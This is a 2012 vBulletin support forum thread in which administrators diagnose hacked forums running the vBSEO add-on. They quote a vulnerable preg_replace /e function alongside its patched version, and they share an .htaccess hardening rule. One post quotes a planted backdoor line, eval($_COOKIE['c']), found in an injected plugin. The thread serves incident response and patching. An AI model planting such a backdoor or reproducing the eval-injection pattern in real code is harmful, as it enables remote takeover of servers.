Login or Sign Up
- Logging in...
  
  Remember me
  
  Forgot password or user name?
  
  or Sign Up
- Log in with Facebook Sign-in with Twitter

Search in titles only Search in vBulletin 3.8 Support & Troubleshooting only

Advanced Search

Forums
Articles
Blogs
Groups
Tracker
Purchase

Trending Topics
Member List
Calendar

Forum
vBulletin 3.8
vBulletin 3.8 Support & Troubleshooting

vBulletin 3 End of Life

vBulletin 3 is end of life and will not be receiving future development. Warning: vBulletin 3.8.11 is not compatible with PHP 7.2.0 or higher.
Welcome to the vBulletin support forums! In our community forums you can receive professional support and assistance with any issues you might have with your vBulletin Products.

Useful Links for Guests:
If you are having problems posting in the relevant areas for your software, please see this topic.

Announcement

Collapse

No announcement yet.

Possible Exploit

Collapse

X

Collapse

Posts
Latest Activity

Page of 4
Filter

Time

All Time Today Last Week Last Month
Show

All Discussions only Photos only Videos only Links only Polls only Events only

Filtered by:

new posts

Previous 1 2 3 4 template Next

Jafo replied

Mon 23 Jan '12, 12:45pm
Originally posted by Talaturen View Post

It seems like people believe this latest vBSEO patch fixes this. IT DOES NOT. 3.6.0 of vBSEO had this patch since release (so users of vBSEO 3.6.0 don't have to apply the patch today as it doesn't patch anything) and my forum has been running with it. This exploit plugin has been added while the forums were already running vBSEO 3.6.0! The current code is still vulnerable!

You are wrong, the patch was NOT in 3.6.0 until we discovered this TODAY. I know, I checked.
Leave a comment:
Loco.M replied

Mon 23 Jan '12, 12:44pm
Originally posted by Jafo View Post

Here it is folks, in functions_vbseocp_abstract.php

PHP Code:

public static function proc_deutf($ptxt, $tocharset) { $ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', "$1")) ? $_s : "$1").stripslashes(\'$2\')', $ptxt); return $ptxt; }

I recommended a patch here over a YEAR ago when we were getting hacked and they said they were going to put it in the latest version.. They did not.. This needs to be:

PHP Code:

public static function proc_deutf($ptxt, $tocharset) { $ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', \'$1\')) ? $_s : \'$1\').stripslashes(\'$2\')', $ptxt); return $ptxt; }

Ouch.. that's a lot of sites at risk for a year..
Leave a comment:
Talaturen replied

Mon 23 Jan '12, 12:37pm
It seems like people believe this latest vBSEO patch fixes this. IT DOES NOT. 3.6.0 of vBSEO had this patch since release (so users of vBSEO 3.6.0 don't have to apply the patch today as it doesn't patch anything) and my forum has been running with it. This exploit plugin has been added while the forums were already running vBSEO 3.6.0! The current code is still vulnerable!
Leave a comment:
briansol replied

Mon 23 Jan '12, 9:48am
http://www.vbseo.com/f5/vbseo-securi...release-52783/
Leave a comment:
DigitalCrowd replied

Mon 23 Jan '12, 9:39am
Yep, I removed it as soon as I saw it.
Leave a comment:
Wayne Luke replied

Mon 23 Jan '12, 9:32am
Originally posted by DigitalCrowd View Post

I have a number of sites I've checked with VBSEO installed and they didn't have this plugin. However a few sites all with vBSEO have them. One site had a "test" plugin for ajax_complete and it referenced:

eval($_COOKIE['c']);

Here is a site that references a PHP compromise with similar code...

http://translate.google.com/translate?hl=en&sl=zh-CN&u=http://www.dis9.com/tools&ei=nH8dT9XALMSKsQLH4dSdCw&sa=X&oi=translate&ct=result&resnum=2&ved=0CDYQ7gEwAQ&prev=/search%3Fq%3Deval(%24_COOKIE%5B%27c%27%5D)%3B%26hl%3Den%26safe%3Doff%26client%3Dsafari%26r ls%3Den%26prmd%3Dimvns

This is a very bad plugin. Very bad. You need to remove it as quickly as possible. With it, your attackers could gain access to your entire server.
Leave a comment:
briansol replied

Mon 23 Jan '12, 9:06am
FYI, the bug has been confirmed and a patch release is enroute.
Leave a comment:
kau replied

Mon 23 Jan '12, 8:18am
It is vBSEO.

All our non-vBSEO sites did not get hacked.

All our vBSEO sites without "Add Page Titles to External Links Anchor Text" enabled did not get hacked.

All our vBSEO sites with "Add Page Titles to External Links Anchor Text" enabled got hacked.

We have every single directory properly permissioned via Apache CONF file and by hand issuing CHMOD commands. We also have our AdminCP in a different directory and it is password protected through .htpasswd.

There are no entries in Control Panel logs that relate to this plugin creation. It was done via injection.
Leave a comment:
Jafo replied

Mon 23 Jan '12, 8:11am
Originally posted by Ace View Post

Just in case - you do have the following .htaccess protection in all writable directories?

Code:

<Files ~ "\.(php\d*|cgi|pl|phtml)$"> order allow,deny deny from all </Files>

Yes we do and we even have admincp and vbseocp.php protected by apache auth..

Trust me, the reason this happened is because that patch was missing.. Bots have been searching for this exploit for almost a year now.. When we upgraded to 3.6.0 the hole was reopened and the bots did what they do.
Leave a comment:
Ace replied

Mon 23 Jan '12, 8:06am
Just in case - you do have the following .htaccess protection in all writable directories?

Code:

<Files ~ "\.(php\d*|cgi|pl|phtml)$"> order allow,deny deny from all </Files>
Leave a comment:
Jafo replied

Mon 23 Jan '12, 7:43am
Just got a confirmation from vbseo that the patch was in their repo, but not in the current version. They said they have updated the current version just now to include the patch.. I really hope they notify their customer base because this exploit is a year old. Bots are probably pre-programmed with this attack vector and there are likely hundreds of them. If you have updated vbseo in the last year, you stand a good chance of being vulnerable. UPGRADE YOUR INSTALL NOW!
Leave a comment:
Jafo replied

Mon 23 Jan '12, 7:33am
Brianso, please look at the above code.. We went through this a year ago, you guys worked with us to supply the patch, but you guys never included it in your product! That is why we got hit, because we just upgraded to the latest version.
Leave a comment:
briansol replied

Mon 23 Jan '12, 7:25am
Title replaces happen real-time as the page is pulled. These are not stored anywhere.

I highly suggest checking your server logs for more detailed information or entries relating to product changes.
Leave a comment:
Jafo replied

Mon 23 Jan '12, 7:22am
Here it is folks, in functions_vbseocp_abstract.php

PHP Code:

public static function proc_deutf($ptxt, $tocharset) { $ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', "$1")) ? $_s : "$1").stripslashes(\'$2\')', $ptxt); return $ptxt; }

I recommended a patch here over a YEAR ago when we were getting hacked and they said they were going to put it in the latest version.. They did not.. This needs to be:

PHP Code:

public static function proc_deutf($ptxt, $tocharset) { $ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', \'$1\')) ? $_s : \'$1\').stripslashes(\'$2\')', $ptxt); return $ptxt; }

Last edited by Jafo; Mon 23 Jan '12, 7:32am.
Leave a comment:
Ace replied

Mon 23 Jan '12, 7:22am
OK. Best of luck figuring it out, I'm watching your ticket with great interest.

<-- works there.
Leave a comment:

Previous 1 2 3 4 template Next

widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.

(vbulletin-web4.internetbrands.com)

vBulletin Default Theme
English (US)

Help
Member's Area
Documentation
Submit Ticket
Privacy Policy
Forum Rules
Contact Us
Go to top

Do Not Sell My Personal Information

Powered by vBulletin® Version 5.6.2
Copyright © 2020 MH Sub I, LLC dba vBulletin. All rights reserved.

All times are GMT-8. This page was generated at 9:05pm.

Working...

X